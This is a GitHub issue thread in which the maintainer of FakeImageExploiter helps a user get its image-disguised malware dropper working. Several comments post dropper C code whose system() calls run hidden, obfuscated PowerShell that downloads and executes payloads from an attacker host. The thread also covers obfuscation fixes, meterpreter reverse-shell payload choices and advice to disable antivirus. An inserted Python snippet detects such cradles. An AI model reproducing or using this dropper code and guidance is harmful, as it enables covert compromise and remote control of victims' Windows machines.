
Comments (14)

r00t-3xp10it commented on July 30, 2024 · 3

wait. I believe I have found the error (and it's in obfuscation)..
check fakeimageexploiter.sh line 332

 echo "pOwErShElL /n\`oP /wI\`N 1 /nO\`nI /e\`N Sh33L" > payload.raw

I bet that's why the 'real' payload doesn't execute on target (because of obfuscation errors)..
(replace line 332 with this one and try again)

 echo "pOwErShElL -noP -wIN 1 -noni -en Sh33L" > payload.raw

Final notes:

I see from your settings file that you have not been able to install Resource-Hacker under wine..
we need to be the two of us online to check (install) RH under wine. I am working on a new tool
named JASTF (Just A Simple Text File [exploiter]) and my wife uses Parrot x64bits; we also have
faced many issues trying to install wine32 under x64bits, but we managed to do it ..
(I have not had the time to update FakeImageExploiter with this fix yet) ..

   BYPASS_RH=YES

from fakeimageexploiter.

Louisees commented on July 30, 2024 · 2

thank you very much, I modified line 336 and it is working now.
fakeimageexploiter.sh line 336

  echo "pOwErShElL /n\`oP /wI\`N 1 /nO\`nI /e\`N Sh33L" > payload.raw
  echo "pOwErShElL -noP -wIN 1 -noni -en Sh33L" > payload.raw


mohbel commented on July 30, 2024 · 1

good work, many many thanks for the assistance


Louisees commented on July 30, 2024 · 1

I have turned off anti-virus and checked the client; the client task manager did not run jpg.exe. I just modified the two files. I tried the win7 and win10 systems. The same failure.
I just changed two files. Other files were not modified.

1. evil.c

#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>

#define _____(i,s,o,g,r,a,m)(i##r##s##o)
#define _ _____(m,i,n,u,a,l,s)

int _()
{
system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('ht'+'tp'+':/'+'/LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & PoWeRsHeLl -wIN 1 -C C:\\Users\\Public\\ScRee & PoWeRsHeLl -wIN 1 -C \"IEX (NeW-oBjEcT nEt.WeBClIeNt).DoWnLoAdSt`RiNg('ht'+'t'+'p:/'+'/LhOsT/payload.EhLh')"");
return 0;
}

2. evil2.c

#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>

#define _____(i,s,o,g,r,a,m)(i##r##s##o)
#define _ _____(m,i,n,u,a,l,s)

int _()
{
system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).DoWnLoAdFiLe('ht'+'tp:'+'/'+'/LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & sTaRt C:\\Users\\Public\\ScRee & PoWeRsHeLl -wIN 1 -C (NeW-oBjEcT nEt.WeBClIeNt).dOwNlOaDfIlE('h'+'ttp:'+'/'+'/LhOsT/payload.EhLh', 'C:\Users\Public\payload.EhLh') & StArT C:\Users\Public\payload.EhLh");
return 0;
}


Louisees commented on July 30, 2024 · 1

I changed FakeImageExploiter.sh

if [ "$ArCh" = "i686" ]; then
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
else
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
fi

and running FakeImageExploiter.sh,

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
|F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|1.3|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+

Extension sellected: .jpg (picture)
Extension sellected: .exe (payload)

'Config settings file to use other extensions'

Codename::Metamorphosis
Author::pedr0 ubuntu::[r00t-3xp10it]
FakeImageExploiter::v1.3::SuspiciousShellActivity©::RedTeam::2017

my settings

root@kali:~/FakeImageExploiter# cat settings | grep -Ev "^$|^#|-"
PICTURE_EXTENSION=jpg
PAYLOAD_EXTENSION=exe
BYPASS_RH=YES
APACHE_WEBROOT=/var/www/html
NON_MSF_PAYLOADS=NO
AUTO_PAYLOAD_BUILD=YES
AGENT_HANDLER_PORT=4444
FAKE_WORD_DOC=NO
USE_PUBLIC_IP=NO
EXTERNAL_IP=write_public_address_here
MSF_REBUILD=OFF
_EOF

The same operation; I don't know why I always fail to run it. Hahahaha


r00t-3xp10it commented on July 30, 2024

well ... it seems that windows updates have changed something ...
"In cmd.exe we call command flags using: [ - ] or: [ / ] <-- this is used as one obfuscated trick"
example 1: powershell.exe -windows hidden (default way)
example 2: powershell.exe /windows hidden


But in your report it seems that the replacement obfuscation trick does not work anymore..
"The term /w`In its not recognized"
"Object not found /wIn - commandnotfoundexception"


possible fixes

1º - edit the template FakeImageExploiter/bin/evil.c
https://github.com/r00t-3xp10it/FakeImageExploiter/blob/master/bin/evil.c

2º - edit the template FakeImageExploiter/bin/evil2.c [.exe payloads]
https://github.com/r00t-3xp10it/FakeImageExploiter/blob/master/bin/evil2.c

3º - replace the string: PoWeRsHeLl /wI`N 1 /C <--- (ALL instances of that pattern)
by: PoWeRsHeLl -wIN 1 -C

4º - save evil.c and evil2.c template and run fakeimageexploiter.sh now ..


Final notes:

  The last upgrade to this project was the implementation of 'obfuscation techniques' into the 'dropper';
  maybe some of those changes are conflicting with recent AMSI rules for detecting malware
  ( which does not seem to be the case here, because we don't see any AMSI bug reports ), so let's
  assume that the bug is in the 'obfuscation' techniques in the 'dropper' when it's executed..


Louisees commented on July 30, 2024

I changed two files, jpg.exe can be executed, but after execution, the server cannot receive the client connection.......


r00t-3xp10it commented on July 30, 2024

Is Anti-Virus (AMSI) detecting the payload ? ..
try to disable anti-virus and see if it executes ..


r00t-3xp10it commented on July 30, 2024

many thanks for this report (this will help me)...

  • 1º so the anti-virus is not the issue, right?

  • 2º maybe the problem is in the obfuscation techniques

    nEw-ObJeCt NeT.WebClIeNt

change evil.c

  system("powershell -w 1 -C (new-object system.net.webclient).downloadfile('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & powershell -w 1 -C C:\\Users\\Public\\ScRee & powershell -w 1 -C \"IEX (new-object net.webclient).downloadstring('http://LhOsT/payload.EhLh')\"");

change evil2.c

   system("powershell -w 1 -C (New-object Net.WebClient).Downloadfile('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & start C:\\Users\\Public\\ScRee & powershell -w 1 -C (New-Object net.WebClient).Downloadfile('http://LhOsT/payload.EhLh', 'C:\Users\Public\payload.EhLh') & start C:\Users\Public\payload.EhLh");

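The maintainer's two comments above describe the cosmetic tricks the dropper strings rely on: `/` instead of `-` as the flag prefix, backticks inside flag names, random casing, and 'ht'+'tp'-style string splitting. The following is an added defender-side example, not code from the thread or the project: it normalizes a command line so those tricks no longer hide the download-cradle indicators, and scores how many of them were present. The sample command lines are constructed, and the case-change threshold is an assumed heuristic.

```python
import re

# Constructed sample command lines (not real telemetry) in the style of the
# strings posted in this thread: two obfuscated invocations and one benign one.
SAMPLES = [
    "pOwErShElL /n`oP /wI`N 1 /nO`nI /e`N Sh33L",
    "PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE"
    "('ht'+'tp'+':/'+'/LhOsT/ScRee', 'C:\\Users\\Public\\ScRee')",
    "powershell -Command Get-ChildItem C:\\Users\\Public",
]

# Indicators are matched against the NORMALIZED line, so casing, backticks
# and slash-style flags no longer hide them.
INDICATORS = [
    ("downloadfile",   re.compile(r"\.downloadfile\(")),
    ("downloadstring", re.compile(r"\.downloadstring\(")),
    ("iex",            re.compile(r"\biex\b")),
    ("hidden_window",  re.compile(r"-w(in(dowstyle)?)?\s+(1|hidden)\b")),
    ("encoded_cmd",    re.compile(r"-e(n(c(odedcommand)?)?)?\s+\S")),
    ("noprofile",      re.compile(r"-nop(rofile)?\b")),
]

def normalize(cmd):
    """Undo the tricks discussed in the thread: strip backticks, fold case,
    rewrite '/flag' as '-flag', and join 'ht'+'tp' literal concatenation."""
    s = cmd.replace("`", "").lower()
    s = re.sub(r"(?<=\s)/(\w)", r"-\1", s)
    s = re.sub(r"'\s*\+\s*'", "", s)
    return s

def case_changes(word):
    """Number of upper/lower transitions between adjacent letters."""
    return sum(1 for a, b in zip(word, word[1:]) if a.isupper() != b.isupper())

def obfuscation_score(cmd):
    """Count cosmetic signals on the RAW line. The threshold of 4 case changes
    is an assumed heuristic: CamelCase cmdlets pass, pOwErShElL does not."""
    score = int("`" in cmd)
    score += bool(re.search(r"'\s*\+\s*'", cmd))
    score += bool(re.search(r"(?<=\s)/\w", cmd))
    score += any(case_changes(w) >= 4 for w in re.findall(r"[A-Za-z]{4,}", cmd))
    return score

def analyze(cmd):
    """Return None for non-PowerShell lines, else indicators and score."""
    norm = normalize(cmd)
    if not norm.lstrip().startswith("powershell"):
        return None
    return {"normalized": norm,
            "indicators": [name for name, rx in INDICATORS if rx.search(norm)],
            "obfuscation": obfuscation_score(cmd)}
```

Running `analyze` over each entry of SAMPLES shows the first two lines normalize to plain `-nop -win 1 -noni -en ...` and `.downloadfile('http://lhost/scree', ...)` forms, while the benign third line yields no indicators and a score of 0.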

Louisees commented on July 30, 2024

I replaced two files; now the client can run, and after the run there is a jpg picture, but the MSF server still does not establish a connection. I tried win7, win10 and win2012 server: the same picture can be run, but the MSF server cannot receive the connection request from the client.

My kali version
Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
root@kali:~# msfconsole -v
Framework Version: 4.17.17-


r00t-3xp10it commented on July 30, 2024

now I am lost ..
there are youtube videos showing this tool working in different operating systems/versions..
https://www.youtube.com/results?search_query=fakeimageexploiter

let me check if the tool still works or not ..
maybe we need to test this step-by-step to figure out what's happening in your distro..

  • 1º - edit FakeImageExploiter.sh and change these next settings..
    pic

  • 2º - change compiler arch
    pic ..

  • 3º - are you sure that you have configured the 'settings' file properly before running the tool ??
    pic

  • 4º - The real payload not executing (the real payload, not the dropper) can also reveal incorrect
    payload arch selection. If you are attacking an x64bit system, did you try it with an x64 arch payload?

    windows/x64/meterpreter/reverse_tcp
    windows/x64/meterpreter/reverse_https

  • 5º - check for zenity installation

    zenity --version


r00t-3xp10it commented on July 30, 2024

aaa I have spotted one error in your configuration ..

   AUTO_PAYLOAD_BUILD=YES
   PAYLOAD_EXTENSION=exe

the above option will instruct the fakeimageexploiter tool to build one payload..
But if you read the settings file it says that the auto_payload_build option will not build .exe payloads
(maybe that's the reason why the payload.exe does not execute, because it doesn't exist?)

pic

If everything is properly installed, then select payload_extension=ps1 (or bat or txt) to be able to use the auto_payload_build option .. If you wish to use one .exe then you need to config the settings file to: auto_payload_build=NO and payload_extension=exe and then input your own .exe in the zenity dialog-box when my tool asks you for it ..

Please review this issue: #16 (comment)

Question: does your distro have the ZENITY package installed ??

does my tool present to you one dialog-box asking questions ?? zenity dialog-boxes
Check if you have zenity installed with this command..

  zenity --version

Download zenity: https://help.gnome.org/users/zenity/


Louisees commented on July 30, 2024

changed the settings,
PICTURE_EXTENSION=jpg
PAYLOAD_EXTENSION=ps1
BYPASS_RH=YES
APACHE_WEBROOT=/var/www/html
NON_MSF_PAYLOADS=NO
AUTO_PAYLOAD_BUILD=YES
AGENT_HANDLER_PORT=4444
FAKE_WORD_DOC=NO
USE_PUBLIC_IP=NO
EXTERNAL_IP=write_public_address_here
MSF_REBUILD=OFF
_EOF

zenity --version
3.30.0

I can run the finished program and create a jpg image. win7 and win10 can run and display the jpg images, but it is impossible to connect to the FakeImageExploiter service.

msf always waiting for the connect ........


r00t-3xp10it commented on July 30, 2024

it's 5:25 am (portugal) ..
now I need to sleep but tomorrow I am free to help you install RH under wine..

here is your prize for helping me (I have written/published this yesterday) ;)
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/hijack/SCRNSAVE_T1180_persistence.rb

mitre ATT&CK T1180: https://gist.github.com/r00t-3xp10it/75c637ffa515ed4260749cbb24e989e2



Recent changes made to FakeImageExploiter (thanks)

pic
pic

Commit (source code bugfixes): 3394c96

